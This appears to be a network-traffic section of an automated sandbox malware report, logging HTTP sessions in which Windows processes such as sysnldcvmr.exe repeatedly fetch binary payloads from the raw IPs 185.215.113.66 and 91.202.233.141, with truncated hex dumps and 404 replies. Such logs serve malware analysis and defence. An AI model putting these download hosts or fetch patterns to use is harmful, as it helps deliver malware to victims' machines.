                                                                                                                  Nov 30, 2024 01:55:22.715646982 CET1236INData Raw: 20 a4 13 18 ef 97 b9 85 4c 87 0c 5e 0c 1a 67 ca 13 4f 06 00 22 3d e6 f5 8f b0 55 76 0f 6c 15 ae 5c 5c 57 5a 79 77 7d ed d9 96 48 e9 f1 39 38 66 67 ea f9 af 95 18 f7 5c 22 93 11 dc 4d 2d 2f 2c 66 ab 39 92 61 3d 01 75 ee 0b cb 04 d5 8c dd 42 4d 1a
                                                                                                                  Data Ascii: L^gO"=Uvl\\WZyw}H98fg\"M-/,f9a=uBMd"=M,Lo1{@QXR:d=GMw(ZD}E?5GN2KsZf#_qGm8Y61Hc!nb&HskiT1L2Y\Z?w(Vg6FA.;r
                                                                                                                  Nov 30, 2024 01:55:22.716288090 CET1236INData Raw: 82 ef 29 d7 83 57 67 67 d1 c1 72 17 81 4d c2 10 51 46 37 9f df 5d 5d c6 a6 e7 87 60 e1 21 98 20 70 0f 63 fc d6 a6 7f 00 d3 65 c6 9b f3 c6 71 fe 78 ec fb 00 0c 86 a7 25 8a 00 32 3a a6 1c 29 b2 89 d8 ac 37 4d 95 04 59 5c b1 46 e3 b1 2f aa d9 cc 11
                                                                                                                  Data Ascii: )WggrMQF7]]`! pceqx%2:)7MY\F/P!&mrDcbn0NWcD83Dkv\sLJ/ aU`|RyzDyc#_T(^V71YtMazp{P^:w(ofe
                                                                                                                  Nov 30, 2024 01:55:22.834219933 CET1236INData Raw: 7e 8d a9 13 7b ea ce ce 59 86 af da ff 6b ca 38 44 bc 32 9a 91 8c 1f 94 36 29 36 c7 1c d6 f8 74 96 7a 5a 96 7d 3b 68 4f 2c de 0e 1a c6 22 83 3c a8 7a 3e 73 40 5f 32 00 76 0a 3f 01 87 54 76 8c 6b 29 ff d0 63 38 3c 45 64 9f db 8f 2c 21 c7 a9 3d 40
                                                                                                                  Data Ascii: ~{Yk8D26)6tzZ};hO,"<z>s@_2v?Tvk)c8<Ed,!=@bV;?{!CxR\~DoP1*5"Na+=|]K%=s74O-ADfix)I(LH9[`>n>H*r5X`hD!Or5REpHt 9CQ')}A
                                                                                                                  Nov 30, 2024 01:55:28.252381086 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:28.694374084 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:28 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.44974491.202.233.141807532C:\Users\user\AppData\Local\Temp\204078699.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:27.411284924 CET178OUTGET /IBSTSWSONL HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.449745185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:29.839159012 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.296329021 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:31 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:55:31.296348095 CET124INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7
                                                                                                                  Nov 30, 2024 01:55:31.296462059 CET1236INData Raw: 69 ec 34 68 6c f0 51 19 4a 05 6f 5b f7 52 78 a6 e3 9e 5b 6e 40 c2 04 fc 67 d9 a2 55 35 36 51 a0 57 4f d4 14 8c 0a 2e 7c 79 44 de 45 8d 1e 2e 62 80 72 66 47 cc 59 3c e4 fe 4e d7 8b 45 24 3b ab 46 40 e5 d7 c4 0a bb fe b0 36 47 2a 32 72 ea 8f 88 2e
                                                                                                                  Data Ascii: i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'>'ex63{A' !w5wG!(sI1GkrH}I=0$P+k8fm3zLiJIFM
                                                                                                                  Nov 30, 2024 01:55:31.296752930 CET1236INData Raw: d3 82 1d d8 c6 ca 7a 16 e7 d8 d4 24 41 68 71 29 24 f7 9c fc aa 1d 63 cb 0b 19 e5 5f ec ba 5d 5c 13 de 51 76 e8 90 4f b4 84 37 e2 4a 79 5f c9 d1 f9 bf ad 8b 45 44 3b 42 31 d9 71 d7 06 38 b7 e8 a8 64 c5 04 e2 b6 0f 4a fc c7 a8 f4 9f cc 9d 35 c4 2d
                                                                                                                  Data Ascii: z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~U#T\^rtBLZhpiVp_Z=9?Pv2DCVE#,uoL@Vm0Ke,3,q>
                                                                                                                  Nov 30, 2024 01:55:31.296762943 CET248INData Raw: 9a 2f 39 d8 07 79 ab 65 57 3a a0 33 03 a7 6e dc 09 8f 28 23 93 a8 0f b2 67 f8 e0 3c d7 1c 14 d1 0d 74 72 cb 93 e7 37 3b 47 96 7a 62 49 9f ed c2 3d dc 94 0b 56 d9 42 83 8d 53 84 59 ca 7e 66 98 6e 7c ca 6f 5f f5 c3 5e 35 1a 97 bb 2e 7e 2f 13 b6 33
                                                                                                                  Data Ascii: /9yeW:3n(#g<tr7;GzbI=VBSY~fn|o_^5.~/3h_Cy1Hz*URy^lxvYf?X8/ qa,Y+s6+zyyfId,}<UF<;'j"A_q_lYG$t`
                                                                                                                  Nov 30, 2024 01:55:31.297162056 CET1236INData Raw: f0 88 d1 dd 88 8b 89 c0 d8 bc e6 2d 69 10 5e aa bd 83 ab ee a4 fc 89 4c 76 23 ba 16 d5 7f 3b d5 16 7b 0e ca ee 2d fc 35 a2 ae 46 bf f2 0d 2c 18 ee 64 16 13 85 25 f3 19 93 00 b1 04 c5 c9 fb cf 8d 26 c9 01 93 23 b2 bd 4b 28 83 a5 0a b7 94 e6 4d d8
                                                                                                                  Data Ascii: -i^Lv#;{-5F,d%&#K(MW,gf"=g,Fnl*8NBa&6`=/s*:[ n*[c|oic5dPFi{~)E~R"<t%E\o,7*'d:JKr
                                                                                                                  Nov 30, 2024 01:55:31.297173023 CET1236INData Raw: 3e d7 e2 1d 60 06 01 e8 6b f4 13 e9 af a5 c1 6c 23 b4 3c d6 0f df cc e8 aa 41 51 3d c3 4f 46 b4 97 04 44 79 86 da 65 f8 25 98 b1 e7 0c 7c b4 5b d2 c2 d8 c9 fb a9 ba 4f d7 ae ef ae 15 3d f7 45 78 cf 26 7e 2d d8 95 38 20 9e 35 1a 21 3f 33 ea d5 fb
                                                                                                                  Data Ascii: >`kl#<AQ=OFDye%|[O=Ex&~-8 5!?3{`v*nker2V#kZHqxc.";E.qMI>XI^ ]WYC$yP['O:*@zZ-^
                                                                                                                  Nov 30, 2024 01:55:31.297626972 CET248INData Raw: e7 83 33 8a 59 ce bd b9 d7 ac 1b 2d c3 d2 f4 07 de 07 41 7e de ac d3 c5 ea da 3d 38 89 45 53 d8 d5 37 22 4b 38 8f c7 e8 5c 02 49 18 ad 12 3b a2 56 93 22 36 53 46 2d 16 79 c7 fb a7 1f 1c cc ec a3 86 55 3a f4 47 55 d9 1e c0 04 76 7a 58 66 a1 28 fa
                                                                                                                  Data Ascii: 3Y-A~=8ES7"K8\I;V"6SF-yU:GUvzXf(t2yJ@j+l|t5<{[!h c_Kx=ACK~#O7L]=D,MGm^+bQg^ oK$z4H4%+5r[E?
                                                                                                                  Nov 30, 2024 01:55:31.297728062 CET1236INData Raw: e5 df 71 cd 37 76 0e c6 52 6e a4 8e 0f 16 54 21 74 70 c2 47 ba 9f b9 41 2a a7 75 4f 04 0a dd 7f b1 33 8f fc 9f be 05 51 b6 b5 5c 37 b9 f0 0c 80 09 af 3d a8 94 d8 7b 38 4e 80 49 b7 4d 50 15 04 c8 99 c3 12 c9 0c 58 5e 7e 75 a6 02 8d db a6 68 23 16
                                                                                                                  Data Ascii: q7vRnT!tpGA*uO3Q\7={8NIMPX^~uh#g\98c2"*AC&h-nQe)6@kWvLq+&DsbQobfeg-7, sKVN6L$=q%H2}j_Y^7.7,e1zb
                                                                                                                  Nov 30, 2024 01:55:31.298000097 CET1236INData Raw: 78 e1 80 d4 e8 44 8d 9d b8 f2 04 a8 25 0c af d0 b2 bb 8f 07 96 dc 25 ee e9 be 9b 84 8a 7f 78 e0 59 a8 24 91 6a 6d e1 17 d7 b3 c6 2f 4f 2f 7b cd 2c 5f 5d b2 f1 4e d7 ea 76 fd dc ff e9 c2 c0 cd 33 01 ef 79 32 5e 5b 14 d6 63 50 61 53 9e d5 1e 5a b3
                                                                                                                  Data Ascii: xD%%xY$jm/O/{,_]Nv3y2^[cPaSZ!;]CJhc#V.WB;0Wt{dW1j/owjun2}$RV0awDeSfb!^zK}BvH*@%n3lo 6f'5-
                                                                                                                  Nov 30, 2024 01:55:31.416412115 CET1236INData Raw: 86 7f b2 4c cf 50 34 41 d8 dd 51 ff a4 a8 19 d8 e2 0a 05 af 73 0f f4 c1 b8 7f 06 d7 e1 cc e8 7e 9e f9 38 99 04 b4 23 f8 16 7c 08 17 61 63 1c 04 12 9a d0 22 b5 1e 15 b6 cf 26 76 b4 4f e3 18 85 c9 98 eb af bd 98 13 41 62 6a a4 76 b4 e9 35 91 2c d3
                                                                                                                  Data Ascii: LP4AQs~8#|ac"&vOAbjv5,K&{/'e)9qZ3{3'C+,qN*!v.*Dt!R:&re=L<.-X8;bqn%/`az\ube%I#&s
                                                                                                                  Nov 30, 2024 01:55:36.850960016 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:37.315712929 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:37 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.44974791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:40.827054977 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.44974891.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:44.325522900 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.44974991.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:47.840939999 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.44975191.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:51.388778925 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:55:52.766302109 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                  Nov 30, 2024 01:55:54.978023052 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:55:55.424717903 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:55 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.449759185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:58.907228947 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.283447027 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:00 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
